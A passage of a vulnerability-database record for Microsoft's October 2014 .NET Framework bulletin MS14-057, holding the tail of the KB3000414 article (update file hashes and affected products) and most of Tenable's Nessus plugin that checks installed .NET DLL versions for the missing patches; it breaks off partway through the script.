class=\"sbody-td\">90C85E6E9B5858C843C9D1384AE8F1718BFE759738FC6C670A6B54E16761D930</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2972100-x64.msu</td><td class=\"sbody-td\">BA7FB9E64BCA3E59AC2310652357065817B3355B</td><td class=\"sbody-td\">0B267ED605A410A328B2EDE3D4F28C4EF781F6F225B5A2F8C0C4F21E87AC046A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2972100-x86.msu</td><td class=\"sbody-td\">2ED06D2B5D61481A10C30622EE9B3065F23AECC7</td><td class=\"sbody-td\">A12D47161C2BC803111D320D37246B069E06FC0823BD97D9DCA3B621D9F009AE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2979570-ia64.msu</td><td class=\"sbody-td\">4584844DAFF8896D9647032CAD2C2C8E43B13DB7</td><td class=\"sbody-td\">728853A40FB3EFAA24090F8946B718C36A958E87CFDC9D3FCA067B84B712216A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2979570-x64.msu</td><td class=\"sbody-td\">646D2E4C8D3649BAB3A7D19AD436ECF22F4021E4</td><td class=\"sbody-td\">82986C6100C5D27CC9CF48F7305C0D99F78FB6ACACA6165198551EF0D6556E67</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2979570-x86.msu</td><td class=\"sbody-td\">F1763AC37FB72D8DA11C6162EE7EA71C0F92DA96</td><td class=\"sbody-td\">2F319B052C45291843A8F0AFA7B087D3D4729A232B7AB1CF3DA43937CCD1070B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2968295-x64.msu</td><td class=\"sbody-td\">9E54756A93C909DE40FCA51F88D5C0EBDC9EF2B8</td><td class=\"sbody-td\">800351B96E0830FD13BE82378C4A96F432318493E8AC524DEB1335115D986323</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2968295-x86.msu</td><td class=\"sbody-td\">5C159A12B314A2EC3D448D572BAC118B6FBED3BC</td><td class=\"sbody-td\">46FE382621C0554241CC52A8EB339C92CCA5478A611EDD1F71AC9FAFBE032A8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2972101-x64.msu</td><td class=\"sbody-td\">5C312B8A8CC10509E7693DD0FB4185461D74D6F1</td><td class=\"sbody-td\">55FA3CAFE95A11F3C40865AE7D1ACD08035DD544D1253628B26C71C9E0B14A15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2972101-x86.msu</td><td class=\"sbody-td\">CDFC9D5340B6733A9E84C1745BDADD011FBDEB18</td><td class=\"sbody-td\">67E4C349C49EFE2E750A02FB603309A745BEC9CB0DDA4A2083EBEC5639598EF3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2978042-x64.msu</td><td class=\"sbody-td\">4B4671DBAE1C60DAA6D8B9CDB40A4279BF31EA93</td><td class=\"sbody-td\">3713DFF1D1906B5C1EA14665C37D0313B8FA0B9039FCE128B0153ABFB5BBC04B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2978042-x86.msu</td><td class=\"sbody-td\">F6ABC2CA0B16D91AB8167EE2A2C17E9EB3C574FD</td><td class=\"sbody-td\">71E0BC0D3D3BBA05ABB066A956A5A5D3905E70C505B9BBF7079865DD5D34D0C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979571-x64.msu</td><td class=\"sbody-td\">65A41D244FDC424654E00E1D8EB9C9B25729F902</td><td class=\"sbody-td\">DB95460031DA85545DFB5CC7E9099039223B6D5D662AA6532D8BD5CBD7CF6536</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979571-x86.msu</td><td class=\"sbody-td\">4E5EDD3FA24B207A821C674D78DA858F1F363A3E</td><td class=\"sbody-td\">ABFB9F76FAAC720F4258D39212D3241D034224E19A3A706596E493B5BD2D54D6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979577-x64.msu</td><td class=\"sbody-td\">9029B740D449AC74DE98B186DA51C09E3BC8DE41</td><td class=\"sbody-td\">90EEFFF2004C0CF4CD47088316A3E0B69E7239E7B6FDAEF3B6B2ED7BAF203326</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979577-x86.msu</td><td class=\"sbody-td\">7136743342F647D3D16B6C9715AF1E07058870C2</td><td class=\"sbody-td\">DC0297B8C66EA34ED3D3261D970EE7C1C4D0F75074EC99B763479FD57A907F78</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2968296-x64.msu</td><td class=\"sbody-td\">A5D0DE083618322CD696C91D30A01C0FF060AF0F</td><td class=\"sbody-td\">869C533AF42E14EC2D5B2BFC8A076AEA8A3958A4ABA92D02BB79DBCF02102B1B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2968296-x86.msu</td><td class=\"sbody-td\">D96BE3355E90A63A43E6D5A91F3E21AC879A7699</td><td class=\"sbody-td\">B2AB8F69247C0C5512FF33667FD4AE6F8606D8181A5E1982D36FF4DC1F2A6AB6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2972103-v2-x64.msu</td><td class=\"sbody-td\">539F9C91D2CFDF2D046DBD96CD6EFE2748702EE0</td><td class=\"sbody-td\">79869AF484F7A0B2B2EDD5D9DE9DB209621032A6C045D2C9C46CB7199868036D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2972103-v2-x86.msu</td><td class=\"sbody-td\">A07E9097F4BB1664DCD6B45112F97933208EFD77</td><td class=\"sbody-td\">352C3EE9FF72986C92809531E93870884A7FC0E78713162D579C06329AB19FBF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2978041-x64.msu</td><td class=\"sbody-td\">93D7DD68C7487670C0AB4D5EB154A0EF5E40A306</td><td class=\"sbody-td\">E8E85B3F3D0AC53436D12D3783CE680C6CEE288642964C5842A650156EE5FB43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2978041-x86.msu</td><td class=\"sbody-td\">80ADD0097BB5940209E825E6948A0935791F2F69</td><td class=\"sbody-td\">20D4349FB5EB2948A65365241CCC4B6D7C041CB57A1515616DE96B2E17C2AB37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979573-x64.msu</td><td class=\"sbody-td\">4E6B3A60155951F82426AACD24D2076875DDE8F7</td><td class=\"sbody-td\">43917781745BEC2D904C02A9BD522FBA1CCE6A6B83842EF561F6EBBC8B605750</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979573-x86.msu</td><td class=\"sbody-td\">48E21177A582CA8F94DB6819D1DCA8A9FFB2AA0B</td><td class=\"sbody-td\">9B1BDB0A281E623BABC8BD9C5C766F5EFCE7ADDFF937F72CDB6E264CDF6FBBA8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979576-x64.msu</td><td class=\"sbody-td\">41A253554010BE99A3CA3A01BAC864D534645253</td><td class=\"sbody-td\">87F60311C67BA282436F9F058177B25722577A2F8693E9FEA3311697DB63A30E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979576-x86.msu</td><td class=\"sbody-td\">322E42AEBB7E4E65BA934D4495C4F9B8A2EE80CD</td><td class=\"sbody-td\">BD33B42826DC144F2C6368D7021DD2AD2C60EF38EE1015C0B532EFF13AE433DE</td></tr></table></div></div><br/></span></div></div></div></div><h2></h2><div class=\"kb-moreinformation-section section\"><a class=\"bookmark\" id=\"appliestoproducts\"></a><br/><h3 class=\"sbody-h3\">Applies to</h3>This article applies to the following:<ul class=\"sbody-free_list\"><li>Microsoft .NET Framework 4.5.2 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows RT 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows RT</li><li>Windows Server 2012</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 4.5.1 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows RT 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows RT</li><li>Windows Server 2012</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 4.5 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows RT 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows RT</li><li>Windows Server 2012</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 4 when used with:<ul class=\"sbody-free_list\"><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 3.5.1 when used with:<ul class=\"sbody-free_list\"><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li></ul></li><li>Microsoft .NET Framework 3.5 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows Server 2012</li></ul></li><li>Microsoft .NET Framework 2.0 Service Pack 2 when used with:<ul class=\"sbody-free_list\"><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li></ul></div></body></html>", "edition": 2, "modified": "2014-10-14T17:33:10", "id": "KB3000414", "href": "https://support.microsoft.com/en-us/help/3000414/", "published": "2014-10-14T00:00:00", "title": "MS14-057: Vulnerabilities in the .NET Framework could allow remote code execution: October 14, 2014", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:40", "description": "The remote Windows host has a version of the Microsoft .NET Framework\nthat is affected by a vulnerability that allows a remote attacker to\nto execute code remotely.", "edition": 25, "published": "2014-10-15T00:00:00", "title": "MS14-057: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (3000414)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4073", "CVE-2014-4122", "CVE-2014-4121"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS14-057.NASL", "href": "https://www.tenable.com/plugins/nessus/78432", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78432);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2014-4073\", \"CVE-2014-4121\", \"CVE-2014-4122\");\n script_bugtraq_id(70312, 70313, 70351);\n script_xref(name:\"MSFT\", value:\"MS14-057\");\n script_xref(name:\"MSKB\", value:\"2968292\");\n script_xref(name:\"MSKB\", value:\"2968294\");\n script_xref(name:\"MSKB\", value:\"2968295\");\n script_xref(name:\"MSKB\", value:\"2968296\");\n script_xref(name:\"MSKB\", value:\"2972098\");\n script_xref(name:\"MSKB\", value:\"2972100\");\n script_xref(name:\"MSKB\", value:\"2972101\");\n script_xref(name:\"MSKB\", value:\"2972103\");\n script_xref(name:\"MSKB\", value:\"2972105\");\n script_xref(name:\"MSKB\", value:\"2972106\");\n script_xref(name:\"MSKB\", value:\"2972107\");\n script_xref(name:\"MSKB\", value:\"2978041\");\n script_xref(name:\"MSKB\", value:\"2978042\");\n script_xref(name:\"MSKB\", value:\"2979568\");\n script_xref(name:\"MSKB\", value:\"2979570\");\n script_xref(name:\"MSKB\", value:\"2979571\");\n script_xref(name:\"MSKB\", value:\"2979573\");\n script_xref(name:\"MSKB\", value:\"2979574\");\n script_xref(name:\"MSKB\", value:\"2979575\");\n script_xref(name:\"MSKB\", value:\"2979576\");\n script_xref(name:\"MSKB\", value:\"2979577\");\n script_xref(name:\"MSKB\", value:\"2979578\");\n\n script_name(english:\"MS14-057: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (3000414)\");\n script_summary(english:\"Checks the version of the .NET files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of the .NET Framework installed on the remote host is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of the Microsoft .NET Framework\nthat is affected by a vulnerability that allows a remote attacker to\nto execute code remotely.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-057\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for .NET Framework 2.0 SP2,\n3.5, 3.5.1, 4.0, 4.5, 4.5.1, and 4.5.2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\n# Windows Embedded is not supported by Nessus\n# There are cases where this plugin is flagging embedded\n# hosts improperly since this update does not apply\n# to those machines\nproductname = get_kb_item(\"SMB/ProductName\");\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-057';\nkbs = make_list(\n \"2968292\",\n \"2968294\",\n \"2968295\",\n \"2968296\",\n \"2972098\",\n \"2972100\",\n \"2972101\",\n \"2972103\",\n \"2972105\",\n \"2972106\",\n \"2972107\",\n \"2978041\",\n \"2978042\",\n \"2979568\",\n \"2979570\",\n \"2979571\",\n \"2979573\",\n \"2979574\",\n \"2979575\",\n \"2979576\",\n \"2979577\",\n \"2979578\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Determine if .NET 4.5, 4.5.1, or 4.5.2 is installed\ndotnet_452_installed = FALSE;\ndotnet_451_installed = FALSE;\ndotnet_45_installed = FALSE;\n\ncount = get_install_count(app_name:'Microsoft .NET Framework');\nif (count > 0)\n{\n installs = get_installs(app_name:'Microsoft .NET Framework');\n foreach install(installs[1])\n {\n ver = install[\"version\"];\n if (ver == \"4.5\") dotnet_45_installed = TRUE;\n if (ver == \"4.5.1\") dotnet_451_installed = TRUE;\n if (ver == \"4.5.2\") dotnet_452_installed = TRUE;\n }\n}\nvuln = 0;\n\n########## KB2968292 #############\n# .NET Framework 2.0 SP2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mscories.dll\", version:\"2.0.50727.4252\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968292\");\nvuln += missing;\n\n########### KB2968294 ############\n# .NET Framework 3.5.1 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mscories.dll\", version:\"2.0.50727.5483\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968294\");\nvuln += missing;\n\n########### KB2968295 ############\n# .NET Framework 3.5 #\n# Windows 8 #\n# Windows Server 2012 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mscorie.dll\", version:\"2.0.50727.6419\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968295\");\nvuln += missing;\n\n\n########### KB2968296 ############\n# .NET Framework 3.5 #\n# Windows 8.1 #\n# Windows Server 2012 R2 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mscorie.dll\", version:\"2.0.50727.8008\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968296\");\nvuln += missing;\n\n\n########## KB2972098 #############\n# .NET Framework 2.0 SP2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"system.dll\", version:\"2.0.50727.4253\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"system.dll\", version:\"2.0.50727.7071\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972098\");\nvuln += missing;\n\n########### KB2972100 ############\n# .NET Framework 3.5.1 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"system.dll\", version:\"2.0.50727.5485\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"system.dll\", version:\"2.0.50727.7071\", min_version:\"2.0.50727.6000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972100\");\nvuln += missing;\n\n\n########## KB2972101 ###########\n# .NET Framework 3.5 #\n# Windows 8 #\n# Windows Server 2012 #\n################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.dll\", version:\"2.0.50727.6421\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.dll\", version:\"2.0.50727.7071\", min_version:\"2.0.50727.6500\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972101\");\nvuln += missing;\n\n########## KB2972103 ###########\n# .NET Framework 3.5 #\n# Windows 8.1 #\n# Windows Server 2012 R2 #\n################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.dll\", version:\"2.0.50727.8009\", min_version:\"2.0.50727.6000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.dll\", version:\"2.0.50727.8615\", min_version:\"2.0.50727.8100\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972103\");\nvuln += missing;\n\n\n########### KB2972105 ############\n# .NET Framework 2.0 SP2 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"2.0.50727.3662\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"2.0.50727.8637\", min_version:\"2.0.50727.8000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972105\");\nvuln += missing;\n\n\n########### KB2972106 ############\n# .NET Framework 4 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n\n# Windows Server 2003 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"4.0.30319.1026\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"4.0.30319.2045\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows Vista/Server 2008 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.1026\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.2045\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows 7/Server 2008 R2 SP1\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.1026\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.2045\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972106\");\nvuln += missing;\n\n########### KB2972107 ############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n # Windows Vista/Server 2008 SP2\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.34238\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.36250\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # Windows 7/Server 2008 R2 SP1\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.34238\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.36250\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972107\");\nvuln += missing;\n\n########### KB2978041 ############\n# .NET Framework 4.5.1/4.5.2 #\n# Windows 8.1 #\n# Windows 8.1 RT #\n# Windows Server 2012 R2 #\n##################################\nmissing = 0;\nif (dotnet_451_installed || dotnet_452_installed)\n{\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.34209\", min_version:\"4.0.30319.18000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.36213\", min_version:\"4.0.30319.35000\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n}\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2978041\");\nvuln += missing;\n\n########## KB2978042 #############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows 8 #\n# Windows RT #\n# Windows Server 2012 #\n##################################\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n missing = 0;\n # GDR\n missing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.34209\", min_version:\" 4.0.30319.18000\", path:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n # LDR\n missing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.resources.dll\", version:\"4.0.30319.36213\", min_version:\" 4.0.30319.35000\", path:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n if (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2978042\");\n vuln += missing;\n}\n\n########## KB2979568 #############\n# .NET Framework 2.0 SP2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"dfdll.dll\", version:\"2.0.50727.4255\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979568\");\nvuln += missing;\n\n########### KB2979570 ############\n# .NET Framework 3.5.1 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"dfdll.dll\", version:\"2.0.50727.5488\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.6500\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979570\");\nvuln += missing;\n\n\n########## KB2979571 ###########\n# .NET Framework 3.5 #\n# Windows 8 #\n# Windows Server 2012 #\n################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.6424\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.6500\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979571\");\nvuln += missing;\n\n\n########## KB2979573 ##############\n# .NET Framework 3.5 #\n# Windows 8.1 #\n# Windows Server 2012 R2 #\n###################################\nmissing = 0;\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.8641\", min_version:\"2.0.50727.8100\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"dfdll.dll\", version:\"2.0.50727.8012\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2979573\");\nvuln += missing;\n\n########### KB2979574 ############\n# 